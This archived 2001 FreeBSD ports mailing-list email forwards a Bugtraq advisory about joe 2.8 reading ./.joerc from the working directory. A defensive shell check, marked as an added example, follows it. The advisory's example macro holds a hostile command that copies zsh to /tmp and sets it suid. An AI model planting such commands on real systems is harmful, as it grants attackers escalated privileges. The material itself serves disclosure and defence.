From owner-freebsd-ports Wed Feb 28 9: 5:10 2001
Delivered-To: freebsd-ports@freebsd.org
Received: from temphost.dragondata.com (temphost.dragondata.com [63.167.131.128])
	by hub.freebsd.org (Postfix) with ESMTP id 391AD37B71B
	for ; Wed, 28 Feb 2001 09:05:04 -0800 (PST)
	(envelope-from toasty@temphost.dragondata.com)
Received: (from toasty@localhost)
	by temphost.dragondata.com (8.9.3/8.9.3) id LAA78614
	for ports@freebsd.org; Wed, 28 Feb 2001 11:05:53 -0600 (CST)
	(envelope-from toasty)
From: Kevin Day
Message-Id: <200102281705.LAA78614@temphost.dragondata.com>
Subject: Joe's Own Editor File Handling Error (fwd)
To: ports@freebsd.org
Date: Wed, 28 Feb 2001 11:05:53 -0600 (CST)
X-Mailer: ELM [version 2.5 PL3]
MIME-Version: 1.0
Content-Type: text/plain; charset=DISPLAY
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-ports@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm working on a patch for this right now, don't FORBID the port yet. :)

-- Kevin

Forwarded message:
> From owner-bugtraq@SECURITYFOCUS.COM Wed Feb 28 10:54:24 2001
> Approved-By: beng@SECURITYFOCUS.COM
> Delivered-To: bugtraq@lists.securityfocus.com
> Delivered-To: bugtraq@securityfocus.com
> X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001
> X-MIMETrack: Serialize by Router on tracy/Wkit(Release 5.0.4a |July 24,
>  2000) at 2001-02-28 15:13:46
> MIME-Version: 1.0
> Content-type: text/plain; charset=iso-8859-1
> Message-ID:
> Date: Wed, 28 Feb 2001 15:13:42 +0100
> Reply-To: advisories@WKIT.COM
> Sender: Bugtraq List
> From: advisories@WKIT.COM
> Subject: Joe's Own Editor File Handling Error
> X-To: submissions@packetstorm.security.com
> To: BUGTRAQ@SECURITYFOCUS.COM
> Content-Transfer-Encoding: 8bit
> X-MIME-Autoconverted: from quoted-printable to 8bit by temphost.dragondata.com id KAA77924
>
> WKIT SECURITY AB
> www.wkit.com
>
>
> TITLE: Joe's Own Editor File Handling Error
> ADVISORY ID: WSIR-01/02-02
> REFERENCE: http://www.wkit.com/advisories
> CVE: GENERIC-MAP-NOMATCH
> CREDIT: Christer Öberg, Wkit Security AB
> CONTACT: advisories@wkit.com
> CLASS: File Handling Error
> OBJECT: joe(1) (exec)
> VENDOR: Josef H. Allen
> STATUS:
> REMOTE: No
> LOCAL: Yes
> VULNERABLE: Joseph Allen joe 2.8
>
> DATE
> CREATED: 26/02/2001
> LAST UPDATED:
> VENDOR CONTACT:
> RELEASE: 28/02/2001
>
> VULNERABILITY DESCRIPTION
> joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
> /usr/local/lib/joerc in that order. Users could be tricked into executing
> commands if they open/edit a file with joe in a directory where other
> users can write.
>
> CONDITIONS
> User using joe in a world/group writable directory.
>
> EXAMPLE
> A user copies the default joerc file to a world writable directory and
> changes
> :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
> to
> :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype
> Another user opens a file in that directory with joe and runs ispell with
> ^[l; the result is a suid shell in /tmp
>
> SOLUTION/VENDOR INFORMATION/WORKAROUND
>
> DISCLAIMER
> The contents of this advisory may be distributed freely, provided that
> no fee is charged and proper credit is given. Wkit Security AB takes
> no credit for this discovery if someone else has published this
> information in the public domain before this advisory was released.
> The information herein is intended for educational purposes, not for
> malicious use. Wkit Security AB takes no responsibility whatsoever for
> the use of this information.
>
> ABOUT
> Wkit Security AB is an independent data security company working with
> security-related services and products.
>
> Wkit Security AB
> Upperudsv. 4
> S-464 72 Håverud
> SWEDEN
> http://www.wkit.com
> e-mail: advisories@wkit.com
>
> (C) 2001 WKIT SECURITY AB
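
A pre-flight check for the ./.joerc lookup order described in the forwarded advisory, as an added example that is not part of the original messages, of joe, or of the FreeBSD port. The function name `joe_cwd_check`, its optional trusted-uid argument and its return codes are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: check a directory before starting joe in it.
# joe_cwd_check is a hypothetical helper, not part of joe or the port.
# Returns: 0 = nothing suspicious
#          1 = directory is group- or world-writable (advisory's condition)
#          2 = a .joerc not owned by the trusted uid is already present
joe_cwd_check() {
    dir=${1:-.}
    me=${2:-$(id -u)}      # uid whose files are trusted (default: caller)
    rc="$dir/.joerc"

    # ./.joerc is read before $HOME/.joerc, so its owner decides
    # whose :def macros (and shell commands) would be loaded.
    if [ -e "$rc" ] || [ -L "$rc" ]; then
        if [ -n "$(find "$rc" -prune ! -user "$me" -print)" ]; then
            echo "UNTRUSTED: $rc is not owned by uid $me"
            return 2
        fi
    fi

    # Anyone with write access to the directory can plant or replace .joerc.
    # -H resolves a symlinked directory argument before testing its mode.
    if [ -n "$(find -H "$dir" -prune \( -perm -0020 -o -perm -0002 \) -print)" ]; then
        echo "RISKY: $dir is group- or world-writable"
        return 1
    fi

    echo "OK: $dir"
    return 0
}
```

Calling `joe_cwd_check . || exit` from a wrapper script in front of the editor refuses to start it in the situation the advisory lists under CONDITIONS.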